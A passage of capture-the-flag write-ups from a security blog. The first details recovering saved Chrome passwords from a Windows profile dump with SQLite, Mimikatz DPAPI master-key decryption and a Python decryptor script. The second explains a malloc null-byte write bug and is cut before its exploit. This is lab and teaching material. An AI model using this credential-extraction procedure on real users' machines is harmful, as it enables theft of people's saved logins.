NOT NULL, date_created INTEGER NOT NULL, blacklisted_by_user INTEGER NOT NULL, scheme INTEGER NOT NULL, password_type INTEGER, times_used INTEGER, form_data BLOB, display_name VARCHAR, icon_url VARCHAR, federation_url VARCHAR, skip_zero_click INTEGER, generation_upload_status INTEGER, possible_username_pairs BLOB, id INTEGER PRIMARY KEY AUTOINCREMENT, date_last_used INTEGER NOT NULL DEFAULT 0, moving_blocked_for BLOB, date_password_modified INTEGER NOT NULL DEFAULT 0, UNIQUE (origin_url, username_element, username_value, password_element, signon_realm));</span><span class="w"> </span><span class="c">... </span><span class="gp">sqlite&gt;</span><span class="w"> </span></code></pre></div></div> <p>There is an entry for the site but the password is encrypted.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">sqlite&gt;</span><span class="w"> </span><span class="k">select</span> <span class="k">*</span> from logins<span class="p">;</span> <span class="go">http://challs.sieberrsec.tech:23547/dcfa237943d4fd7e2a514ca54642efaccd2cdbd5003bfb19a1e70737273e1190/|http://challs.sieberrsec.tech:23547/dcfa237943d4fd7e2a514ca54642efaccd2cdbd5003bfb19a1e70737273e1190/|username|Alex24|password|v10���/F��n�dCJ��9ނ\||http://challs.sieberrsec.tech:23547/|13284792800298041|0|0|0|0|�||||0|0||1|13284792797426951||13284792800298530 </span><span class="gp">sqlite&gt;</span><span class="w"> </span></code></pre></div></div> <p>Decrypting this value differs according to Google Chrome version. The pertinent pull request for the decryption scheme is given in <a href="https://chromium-review.googlesource.com/c/chromium/src/+/1842671">Chromium 1842671</a>. We can observe that this change occured first in <a href="https://github.com/chromium/chromium/commit/265b39473af0faac989b44afb6d4eb5cb2fd2e24">version 80.0.3948.0</a>.</p> <p>The <code class="language-plaintext highlighter-rouge">password_value</code> blob is encrypted with a wrapped AES key in GCM mode. This wrapped key is itself encrypted using the <a href="https://en.wikipedia.org/wiki/Data_Protection_API">Windows Data Protection API</a> with the <a href="https://docs.microsoft.com/en-us/windows/win32/api/dpapi/nf-dpapi-cryptprotectdata"><code class="language-plaintext highlighter-rouge">CryptProtectData</code> call</a>.</p> <p>The wrapped key is stored in the <code class="language-plaintext highlighter-rouge">Local Data</code> JSON file in the <code class="language-plaintext highlighter-rouge">os_crypt.encrypted_key</code> field.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span><span class="nb">cat</span> <span class="s1">'AppData/Local/Google/Chrome/User Data/Local State'</span> | jq <span class="nt">-r</span> .os_crypt.encrypted_key <span class="go">RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABzlbQ33sJ6SIG+uML5tN8VAAAAAAIAAAAAABBmAAAAAQAAIAAAAK3K+lbEQhgKWXCUhfBo0B3IclDK4Trudr1YXLSpiVrZAAAAAA6AAAAAAgAAIAAAAI8CLxksWgwYvM4vJvniv+XVLtpiEjhmLvA/iNiLLrJ7MAAAAA4T0R9gdcrWpucsGmwbEFAMUGY30fRbTVyNUqLHgDT/qIqALJL3l0xcj0qgEVilWEAAAAB+xquYwbQPWjx7gsQOB1svow83EbccXe8sxn1gNotgQeISqaJkDdiRxWmVuEJg4tJmqLENgBs1ZJuzFtYb7fQ3 </span></code></pre></div></div> <p>If we decode the base64, we can confirm that it syncs up with what is expected from the Chromium <a href="https://github.com/chromium/chromium/blob/f95c449bb79a961ae3332f6783f770159a3e1189/components/os_crypt/os_crypt_win.cc#L36">source code</a>. The <code class="language-plaintext highlighter-rouge">DPAPI</code> prefix is present and should be removed prior to running an <code class="language-plaintext highlighter-rouge">CryptUnprotectData</code> call.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span><span class="nb">cat</span> <span class="s1">'AppData/Local/Google/Chrome/User Data/Local State'</span> | jq <span class="nt">-r</span> .os_crypt.encrypted_key | <span class="nb">base64</span> <span class="nt">-d</span> | xxd <span class="go">00000000: 4450 4150 4901 0000 00d0 8c9d df01 15d1 DPAPI........... 00000010: 118c 7a00 c04f c297 eb01 0000 0073 95b4 ..z..O.......s.. 00000020: 37de c27a 4881 beb8 c2f9 b4df 1500 0000 7..zH........... 00000030: 0002 0000 0000 0010 6600 0000 0100 0020 ........f...... 00000040: 0000 00ad cafa 56c4 4218 0a59 7094 85f0 ......V.B..Yp... 00000050: 68d0 1dc8 7250 cae1 3aee 76bd 585c b4a9 h...rP..:.v.X\.. 00000060: 895a d900 0000 000e 8000 0000 0200 0020 .Z............. 00000070: 0000 008f 022f 192c 5a0c 18bc ce2f 26f9 ...../.,Z..../&amp;. 00000080: e2bf e5d5 2eda 6212 3866 2ef0 3f88 d88b ......b.8f..?... 00000090: 2eb2 7b30 0000 000e 13d1 1f60 75ca d6a6 ..{0.......`u... 000000a0: e72c 1a6c 1b10 500c 5066 37d1 f45b 4d5c .,.l..P.Pf7..[M\ 000000b0: 8d52 a2c7 8034 ffa8 8a80 2c92 f797 4c5c .R...4....,...L\ 000000c0: 8f4a a011 58a5 5840 0000 007e c6ab 98c1 .J..X.X@...~.... 000000d0: b40f 5a3c 7b82 c40e 075b 2fa3 0f37 11b7 ..Z&lt;{....[/..7.. 000000e0: 1c5d ef2c c67d 6036 8b60 41e2 12a9 a264 .].,.}`6.`A....d 000000f0: 0dd8 91c5 6995 b842 60e2 d266 a8b1 0d80 ....i..B`..f.... 00000100: 1b35 649b b316 d61b edf4 37 .5d.......7 </span></code></pre></div></div> <p>First, we can extract the DPAPI encrypted data without the prefix into a file called <code class="language-plaintext highlighter-rouge">blob</code>:</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">In</span> <span class="p">[</span><span class="mi">4</span><span class="p">]:</span> <span class="kn">import</span> <span class="nn">json</span><span class="p">,</span> <span class="n">base64</span> <span class="n">In</span> <span class="p">[</span><span class="mi">5</span><span class="p">]:</span> <span class="n">x</span> <span class="o">=</span> <span class="n">json</span><span class="p">.</span><span class="n">load</span><span class="p">(</span><span class="nb">open</span><span class="p">(</span><span class="s">'AppData/Local/Google/Chrome/User Data/Local State'</span><span class="p">,</span> <span class="s">'rb'</span><span class="p">))[</span><span class="s">'os_crypt'</span><span class="p">][</span><span class="s">'encrypted_key'</span><span class="p">]</span> <span class="n">In</span> <span class="p">[</span><span class="mi">6</span><span class="p">]:</span> <span class="n">x</span> <span class="o">=</span> <span class="n">base64</span><span class="p">.</span><span class="n">b64decode</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> <span class="n">In</span> <span class="p">[</span><span class="mi">7</span><span class="p">]:</span> <span class="nb">open</span><span class="p">(</span><span class="s">"blob"</span><span class="p">,</span><span class="s">'wb'</span><span class="p">).</span><span class="n">write</span><span class="p">(</span><span class="n">x</span><span class="p">[</span><span class="mi">5</span><span class="p">:])</span> <span class="n">Out</span><span class="p">[</span><span class="mi">7</span><span class="p">]:</span> <span class="mi">262</span> </code></pre></div></div> <p>Next, we need to decrypt this blob with DPAPI. According to <a href="https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/dpapi-extracting-passwords">HackTricks</a>, the DPAPI master keys can be found in the <code class="language-plaintext highlighter-rouge">AppData/Roaming/Microsoft/Protect/</code> directory under the user’s SID. These master keys are, of course, themselves protected by the user’s computer password.</p> <p>Looking in the <code class="language-plaintext highlighter-rouge">Protect</code> directory yields the following files, also conveniently letting us know the user’s SID. <code class="language-plaintext highlighter-rouge">37b49573-c2de-487a-81be-b8c2f9b4df15</code> is the master key file.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>find AppData/Roaming/Microsoft/Protect/ <span class="go">AppData/Roaming/Microsoft/Protect/ AppData/Roaming/Microsoft/Protect//S-1-5-21-1937579505-2679969469-2152769792-1001 AppData/Roaming/Microsoft/Protect//S-1-5-21-1937579505-2679969469-2152769792-1001/Preferred AppData/Roaming/Microsoft/Protect//S-1-5-21-1937579505-2679969469-2152769792-1001/37b49573-c2de-487a-81be-b8c2f9b4df15 AppData/Roaming/Microsoft/Protect//CREDHIST </span></code></pre></div></div> <p>The decrypted master key can be extracted from this file using Mimikatz with the user’s password. The final <code class="language-plaintext highlighter-rouge">key :</code> field contains the master key that can be used with other Mimikatz commands.</p> <p>From the challenge prompt, we are given the user’s computer password: <code class="language-plaintext highlighter-rouge">Password1</code>.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">mimikatz #</span><span class="w"> </span>dpapi::masterkey /in:37b49573-c2de-487a-81be-b8c2f9b4df15 /sid:S-1-5-21-1937579505-2679969469-2152769792-1001 /password:Password1 /protected <span class="go">**MASTERKEYS** dwVersion : 00000002 - 2 szGuid : {37b49573-c2de-487a-81be-b8c2f9b4df15} dwFlags : 00000005 - 5 dwMasterKeyLen : 000000b0 - 176 dwBackupKeyLen : 00000090 - 144 dwCredHistLen : 00000014 - 20 dwDomainKeyLen : 00000000 - 0 [masterkey] **MASTERKEY** dwVersion : 00000002 - 2 salt : 0eab1ddb63fd2af7084ce8d9f9e63627 rounds : 00001f40 - 8000 algHash : 0000800e - 32782 (CALG_SHA_512) algCrypt : 00006610 - 26128 (CALG_AES_256) pbKey : 5c84f8625f8a4c9c787de1e9f6b32d132b658794d9f7640e3454b29ac5f5b36e6bfd4f86bf1d919bac543a252d5a94185e4dd49b1590e335675457e9f76ad91d9a0b25072b1b4b3bb9ef60b776cc6dfabfe3e683dc4cfb442016b508651290ad1d29b2cba2d972f73445c7a4788ffdca21aa3f341776aaf5f8b5b42cbb417da70d93a2f185b458a6e5b089f4b0c93412 [backupkey] **MASTERKEY** dwVersion : 00000002 - 2 salt : b48c96813ad38e18d0c844b5e04011bc rounds : 00001f40 - 8000 algHash : 0000800e - 32782 (CALG_SHA_512) algCrypt : 00006610 - 26128 (CALG_AES_256) pbKey : 3a7434ac385f98dae77dfef87387bdab92ad5d68e2f100e2738fc0b359425437903a60e1cb84979b93217e204af73876ea26feb2c1e104467a05a5052c95446d8f0b31767a2e4e411cb0a11fa0a39c1e12e43ad7d68069bfe5a06baef4727bac962a0326ad1e1c9e051206321c2e6a30 [credhist] **CREDHIST INFO** dwVersion : 00000003 - 3 guid : {3a0a76a2-7cde-4675-ba7d-b3e858d5f9ad} [masterkey] with password: Password1 (protected user) key : 907de0d2d2f63f6478cfd2433dbf1c868a440246f415d709598fd5cfaceb422cb878944803a6b20a02ec593af2e5bceca5c8fae4cb175680b867ab8f1b45067f sha1: 6f76fc2c00dbd0c024a7779ad27d9397c1f833da </span><span class="gp">mimikatz #</span><span class="w"> </span></code></pre></div></div> <p>The previously dumped <code class="language-plaintext highlighter-rouge">os_crypt</code> blob can now be decrypted with another Mimikatz command using the extracted master key.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">mimikatz #</span><span class="w"> </span>dpapi::blob /masterkey:907de0d2d2f63f6478cfd2433dbf1c868a440246f415d709598fd5cfaceb422cb878944803a6b20a02ec593af2e5bceca5c8fae4cb175680b867ab8f1b45067f /in:<span class="s2">"blob"</span> /out:blob.dec <span class="go">**BLOB** dwVersion : 00000001 - 1 guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb} dwMasterKeyVersion : 00000001 - 1 guidMasterKey : {37b49573-c2de-487a-81be-b8c2f9b4df15} dwFlags : 00000000 - 0 () dwDescriptionLen : 00000002 - 2 szDescription : algCrypt : 00006610 - 26128 (CALG_AES_256) dwAlgCryptLen : 00000100 - 256 dwSaltLen : 00000020 - 32 pbSalt : adcafa56c442180a59709485f068d01dc87250cae13aee76bd585cb4a9895ad9 dwHmacKeyLen : 00000000 - 0 pbHmackKey : algHash : 0000800e - 32782 (CALG_SHA_512) dwAlgHashLen : 00000200 - 512 dwHmac2KeyLen : 00000020 - 32 pbHmack2Key : 8f022f192c5a0c18bcce2f26f9e2bfe5d52eda621238662ef03f88d88b2eb27b dwDataLen : 00000030 - 48 pbData : 0e13d11f6075cad6a6e72c1a6c1b10500c506637d1f45b4d5c8d52a2c78034ffa88a802c92f7974c5c8f4aa01158a558 dwSignLen : 00000040 - 64 pbSign : 7ec6ab98c1b40f5a3c7b82c40e075b2fa30f3711b71c5def2cc67d60368b6041e212a9a2640dd891c56995b84260e2d266a8b10d801b35649bb316d61bedf437 </span><span class="gp"> * volatile cache: GUID:{37b49573-c2de-487a-81be-b8c2f9b4df15};</span>KeyHash:6f76fc2c00dbd0c024a7779ad27d9397c1f833da <span class="go"> * masterkey : 907de0d2d2f63f6478cfd2433dbf1c868a440246f415d709598fd5cfaceb422cb878944803a6b20a02ec593af2e5bceca5c8fae4cb175680b867ab8f1b45067f description : Write to file 'blob.dec' is OK </span><span class="gp">mimikatz #</span><span class="w"> </span></code></pre></div></div> <p>To do the final decryption of the Chrome login credentials, we can adapt <a href="https://github.com/ohyicong/decrypt-chrome-passwords/blob/main/decrypt_chrome_password.py">this Python script</a> to use the manually dumped Chrome <code class="language-plaintext highlighter-rouge">os_crypt</code> key.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#Full Credits to LimerBoy </span><span class="kn">import</span> <span class="nn">os</span> <span class="kn">import</span> <span class="nn">re</span> <span class="kn">import</span> <span class="nn">sys</span> <span class="kn">import</span> <span class="nn">json</span> <span class="kn">import</span> <span class="nn">base64</span> <span class="kn">import</span> <span class="nn">sqlite3</span> <span class="kn">import</span> <span class="nn">win32crypt</span> <span class="kn">from</span> <span class="nn">Cryptodome.Cipher</span> <span class="kn">import</span> <span class="n">AES</span> <span class="kn">import</span> <span class="nn">shutil</span> <span class="kn">import</span> <span class="nn">csv</span> <span class="k">def</span> <span class="nf">get_secret_key</span><span class="p">():</span> <span class="n">secret_key</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s">'blob.dec'</span><span class="p">,</span> <span class="s">'rb'</span><span class="p">)</span> <span class="k">return</span> <span class="n">secret_key</span> <span class="k">def</span> <span class="nf">decrypt_payload</span><span class="p">(</span><span class="n">cipher</span><span class="p">,</span> <span class="n">payload</span><span class="p">):</span> <span class="k">return</span> <span class="n">cipher</span><span class="p">.</span><span class="n">decrypt</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="k">def</span> <span class="nf">generate_cipher</span><span class="p">(</span><span class="n">aes_key</span><span class="p">,</span> <span class="n">iv</span><span class="p">):</span> <span class="k">return</span> <span class="n">AES</span><span class="p">.</span><span class="n">new</span><span class="p">(</span><span class="n">aes_key</span><span class="p">,</span> <span class="n">AES</span><span class="p">.</span><span class="n">MODE_GCM</span><span class="p">,</span> <span class="n">iv</span><span class="p">)</span> <span class="k">def</span> <span class="nf">decrypt_password</span><span class="p">(</span><span class="n">ciphertext</span><span class="p">,</span> <span class="n">secret_key</span><span class="p">):</span> <span class="k">try</span><span class="p">:</span> <span class="c1">#(3-a) Initialisation vector for AES decryption </span> <span class="n">initialisation_vector</span> <span class="o">=</span> <span class="n">ciphertext</span><span class="p">[</span><span class="mi">3</span><span class="p">:</span><span class="mi">15</span><span class="p">]</span> <span class="c1">#(3-b) Get encrypted password by removing suffix bytes (last 16 bits) </span> <span class="c1">#Encrypted password is 192 bits </span> <span class="n">encrypted_password</span> <span class="o">=</span> <span class="n">ciphertext</span><span class="p">[</span><span class="mi">15</span><span class="p">:</span><span class="o">-</span><span class="mi">16</span><span class="p">]</span> <span class="c1">#(4) Build the cipher to decrypt the ciphertext </span> <span class="n">cipher</span> <span class="o">=</span> <span class="n">generate_cipher</span><span class="p">(</span><span class="n">secret_key</span><span class="p">,</span> <span class="n">initialisation_vector</span><span class="p">)</span> <span class="n">decrypted_pass</span> <span class="o">=</span> <span class="n">decrypt_payload</span><span class="p">(</span><span class="n">cipher</span><span class="p">,</span> <span class="n">encrypted_password</span><span class="p">)</span> <span class="n">decrypted_pass</span> <span class="o">=</span> <span class="n">decrypted_pass</span><span class="p">.</span><span class="n">decode</span><span class="p">()</span> <span class="k">return</span> <span class="n">decrypted_pass</span> <span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span> <span class="k">print</span><span class="p">(</span><span class="s">"%s"</span><span class="o">%</span><span class="nb">str</span><span class="p">(</span><span class="n">e</span><span class="p">))</span> <span class="k">print</span><span class="p">(</span><span class="s">"[ERR] Unable to decrypt, Chrome version &lt;80 not supported. Please check."</span><span class="p">)</span> <span class="k">return</span> <span class="s">""</span> <span class="k">def</span> <span class="nf">get_db_connection</span><span class="p">(</span><span class="n">chrome_path_login_db</span><span class="p">):</span> <span class="k">try</span><span class="p">:</span> <span class="k">return</span> <span class="n">sqlite3</span><span class="p">.</span><span class="n">connect</span><span class="p">(</span><span class="n">chrome_path_login_db</span><span class="p">)</span> <span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span> <span class="k">print</span><span class="p">(</span><span class="s">"%s"</span><span class="o">%</span><span class="nb">str</span><span class="p">(</span><span class="n">e</span><span class="p">))</span> <span class="k">print</span><span class="p">(</span><span class="s">"[ERR] Chrome database cannot be found"</span><span class="p">)</span> <span class="k">return</span> <span class="bp">None</span> <span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">'__main__'</span><span class="p">:</span> <span class="n">secret_key</span> <span class="o">=</span> <span class="n">get_secret_key</span><span class="p">()</span> <span class="n">chrome_path_login_db</span> <span class="o">=</span> <span class="s">"Login Data"</span> <span class="n">conn</span> <span class="o">=</span> <span class="n">get_db_connection</span><span class="p">(</span><span class="n">chrome_path_login_db</span><span class="p">)</span> <span class="k">if</span><span class="p">(</span><span class="n">secret_key</span> <span class="ow">and</span> <span class="n">conn</span><span class="p">):</span> <span class="n">cursor</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">cursor</span><span class="p">()</span> <span class="n">cursor</span><span class="p">.</span><span class="n">execute</span><span class="p">(</span><span class="s">"SELECT action_url, username_value, password_value FROM logins"</span><span class="p">)</span> <span class="k">for</span> <span class="n">index</span><span class="p">,</span><span class="n">login</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">cursor</span><span class="p">.</span><span class="n">fetchall</span><span class="p">()):</span> <span class="n">url</span> <span class="o">=</span> <span class="n">login</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="n">username</span> <span class="o">=</span> <span class="n">login</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="n">ciphertext</span> <span class="o">=</span> <span class="n">login</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="k">if</span><span class="p">(</span><span class="n">url</span><span class="o">!=</span><span class="s">""</span> <span class="ow">and</span> <span class="n">username</span><span class="o">!=</span><span class="s">""</span> <span class="ow">and</span> <span class="n">ciphertext</span><span class="o">!=</span><span class="s">""</span><span class="p">):</span> <span class="n">decrypted_password</span> <span class="o">=</span> <span class="n">decrypt_password</span><span class="p">(</span><span class="n">ciphertext</span><span class="p">,</span> <span class="n">secret_key</span><span class="p">)</span> <span class="k">print</span><span class="p">(</span><span class="s">"Sequence: %d"</span><span class="o">%</span><span class="p">(</span><span class="n">index</span><span class="p">))</span> <span class="k">print</span><span class="p">(</span><span class="s">"URL: %s</span><span class="se">\n</span><span class="s">User Name: %s</span><span class="se">\n</span><span class="s">Password: %s</span><span class="se">\n</span><span class="s">"</span><span class="o">%</span><span class="p">(</span><span class="n">url</span><span class="p">,</span><span class="n">username</span><span class="p">,</span><span class="n">decrypted_password</span><span class="p">))</span> <span class="k">print</span><span class="p">(</span><span class="s">"*"</span><span class="o">*</span><span class="mi">50</span><span class="p">)</span> <span class="n">cursor</span><span class="p">.</span><span class="n">close</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="n">close</span><span class="p">()</span> </code></pre></div></div> <p>Running the script gives us:</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>python decrypt_chrome_password.py <span class="go">Sequence: 0 URL: http://challs.sieberrsec.tech:23547/dcfa237943d4fd7e2a514ca54642efaccd2cdbd5003bfb19a1e70737273e1190/ User Name: Alex24 Password: IHeartCookies ************************************************** </span></code></pre></div></div> <p>Logging into the site with the decrypted Chrome credentials gives us our flag:</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>curl <span class="s1">'http://challs.sieberrsec.tech:23547/dcfa237943d4fd7e2a514ca54642efaccd2cdbd5003bfb19a1e70737273e1190/'</span> <span class="se">\</span> <span class="nt">--data</span> <span class="s1">'username=Alex24&amp;password=IHeartCookies&amp;submit=Login'</span> <span class="go"> </span><span class="gp">&lt;!DOCTYPE html&gt;</span><span class="w"> </span><span class="gp">&lt;html&gt;</span><span class="w"> </span><span class="gp"> &lt;head&gt;</span><span class="w"> </span><span class="gp"> &lt;title&gt;</span>Flag&lt;/title&gt; <span class="c"> ... </span><span class="gp"> &lt;/head&gt;</span><span class="w"> </span><span class="gp"> &lt;body&gt;</span><span class="w"> </span><span class="gp"> &lt;div class="topnav"&gt;</span><span class="w"> </span><span class="gp"> &lt;h1&gt;</span>Flag&lt;/h1&gt; <span class="gp"> &lt;/div&gt;</span><span class="w"> </span><span class="gp"> &lt;br&gt;</span>&lt;br&gt; <span class="gp"> &lt;div class="flagbox"&gt;</span><span class="w"> </span><span class="gp"> &lt;p&gt;</span>IRS<span class="o">{</span>aL1_uR_p45sw0rD_4r3_b3LOnG_t0_u5<span class="o">}</span>&lt;/p&gt; <span class="gp"> &lt;/div&gt;</span><span class="w"> </span><span class="gp"> &lt;/body&gt;</span><span class="w"> </span><span class="gp">&lt;/html&gt;</span><span class="w"> </span></code></pre></div></div> <p><strong>Flag:</strong> <code class="language-plaintext highlighter-rouge">IRS{aL1_uR_p45sw0rD_4r3_b3LOnG_t0_u5}</code></p>amon (j. heng)amon@nandynarwhals.orghttps://nandynarwhals.org

Summary: A dump of a Windows user’s AppData containing Google Chrome library data files and Windows DPAPI master key files can be used in conjunction with the user’s computer password to extract saved website login credentials.

2021-12-28T00:00:00+08:002021-12-28T00:00:00+08:00https://nandynarwhals.org/sieberrsec-ctf-3.0-malloc<p>Summary: Control of the size parameter to malloc and a subsequent lack of checking that the returned pointer is not 0 leads to an arbitrary null byte write to sensitive addresses such as a global variable. This variable is then used in a check condition to allow the printing of a flag.</p> <h2 id="challenge-prompt">Challenge Prompt</h2> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">malloc</span> <span class="n">Binary</span> <span class="n">Exploitation</span> <span class="nf">Solves</span> <span class="p">(</span><span class="mi">2</span><span class="p">)</span> <span class="o">-</span> <span class="mi">400</span> <span class="n">Points</span> <span class="n">Can</span> <span class="n">you</span> <span class="n">somehow</span> <span class="n">get</span> <span class="n">the</span> <span class="n">flag</span><span class="o">?</span> <span class="n">Have</span> <span class="n">fun</span><span class="o">!</span> <span class="n">nc</span> <span class="n">challs</span><span class="p">.</span><span class="n">sieberrsec</span><span class="p">.</span><span class="n">tech</span> <span class="mi">1470</span> <span class="cp">#include &lt;unistd.h&gt; </span> <span class="cp">#include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; </span> <span class="c1">// cc malloc.c -o malloc -fstack-protector-all</span> <span class="kt">int</span> <span class="n">main</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// Variables</span> <span class="kt">int</span> <span class="o">*</span><span class="n">arr</span><span class="p">;</span> <span class="c1">// int pointer to an array</span> <span class="kt">char</span> <span class="o">*</span><span class="n">msg</span><span class="p">;</span> <span class="c1">// C-string to store your message</span> <span class="kt">size_t</span> <span class="n">length</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">// Welcome message</span> <span class="n">puts</span><span class="p">(</span><span class="s">"Welcome to Sieberrsec CTF!"</span><span class="p">);</span> <span class="c1">// Allocates 123456 bytes of memory</span> <span class="n">arr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int</span> <span class="o">*</span><span class="p">)</span><span class="n">malloc</span><span class="p">(</span><span class="mi">123456</span><span class="p">);</span> <span class="c1">// Sets first element of arr to 1</span> <span class="n">arr</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="c1">// Leaks the memory address of arr</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Leak: %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">arr</span><span class="p">);</span> <span class="c1">// Gets length of your message</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Length of your message: "</span><span class="p">);</span> <span class="n">scanf</span><span class="p">(</span><span class="s">"%lu"</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">length</span><span class="p">);</span> <span class="c1">// Allocates memory to store your message as a C-string</span> <span class="c1">// +1 is to store the null-byte that ends the string</span> <span class="n">msg</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="n">length</span> <span class="o">+</span> <span class="mi">1</span><span class="p">);</span> <span class="c1">// Reads length bytes of input into msg</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Enter your message: "</span><span class="p">);</span> <span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">msg</span><span class="p">,</span> <span class="n">length</span><span class="p">);</span> <span class="c1">// Null-byte to end the string</span> <span class="n">msg</span><span class="p">[</span><span class="n">length</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">// Write length bytes from msg</span> <span class="n">write</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="n">msg</span><span class="p">,</span> <span class="n">length</span><span class="p">);</span> <span class="c1">// Your goal: somehow make arr[0] == 0</span> <span class="k">if</span> <span class="p">(</span><span class="n">arr</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="n">system</span><span class="p">(</span><span class="s">"cat flag"</span><span class="p">);</span> <span class="p">}</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></div></div> <h2 id="solution">Solution</h2> <p>First, we compile the program according to the challenge prompt.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>cc malloc.c <span class="nt">-o</span> malloc <span class="nt">-fstack-protector-all</span> </code></pre></div></div> <p>We can run this without any buffering with the following command. From the source code and the dynamic behaviour of the program, we can observe that there should not be any buffer overflow issues here since the calculation of the length appears to be sound and no integer type confusion is occurring.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span><span class="nb">stdbuf</span> <span class="nt">-i0</span> <span class="nt">-o0</span> <span class="nt">-e0</span> ./malloc <span class="go">Welcome to Sieberrsec CTF! Leak: 0x1cb9010 Length of your message: 100 Enter your message: AAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAA </span></code></pre></div></div> <p>Instead, the issue here is that the return value of malloc is not checked. On any sufficiently large size provided, the return value of the call will return zero.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span><span class="nv">$ </span>ltrace ./malloc <span class="gp">__libc_start_main(0x400766, 1, 0x7fff90b069b8, 0x400870 &lt;unfinished ...&gt;</span><span class="w"> </span><span class="go">puts("Welcome to Sieberrsec CTF!"Welcome to Sieberrsec CTF! ) = 27 malloc(123456) = 0x1588420 printf("Leak: %p\n", 0x1588420Leak: 0x1588420 ) = 16 printf("Length of your message: ") = 24 __isoc99_scanf(0x400932, 0x7fff90b068b0, 0x7f73d935b780, 24Length of your message: 9999999999999 ) = 1 malloc(10000000000000) = 0 printf("Enter your message: ") = 20 read(0A , nil, 9999999999999) = -1 --- SIGSEGV (Segmentation fault) --- +++ killed by SIGSEGV +++ </span></code></pre></div></div> <p>This behaviour in conjunction with the following line of code gives us an arbitrary zero byte write primitive to any address.</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="c1">// Null-byte to end the string</span> <span class="n">msg</span><span class="p">[</span><span class="n">length</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </code></pre></div></div> <p>Since the goal is to write to this array using the leaked address, we can use the primitive by simply providing the leaked address as the length. This eventually resolves to <code class="language-plaintext highlighter-rouge">&amp;0[leak] = 0</code> which writes a zero byte to the exact address we require.</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="c1">// Allocates 123456 bytes of memory</span> <span class="n">arr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int</span> <span class="o">*</span><span class="p">)</span><span class="n">malloc</span><span class="p">(</span><span class="mi">123456</span><span class="p">);</span> <span class="c1">// Sets first element of arr to 1</span> <span class="n">arr</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="c1">// Leaks the memory address of arr</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Leak: %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">arr</span><span class="p">);</span> <span class="p">...</span> <span class="c1">// Your goal: somehow make arr[0] == 0</span> <span class="k">if</span> <span class="p">(</span><span class="n">arr</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="n">system</span><span class="p">(</span><span class="s">"cat flag"</span><span class="p">);</span> <span class="p">}</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </code></pre></div></div> <p>Putting this all together in an exploit gives us:</p> <div 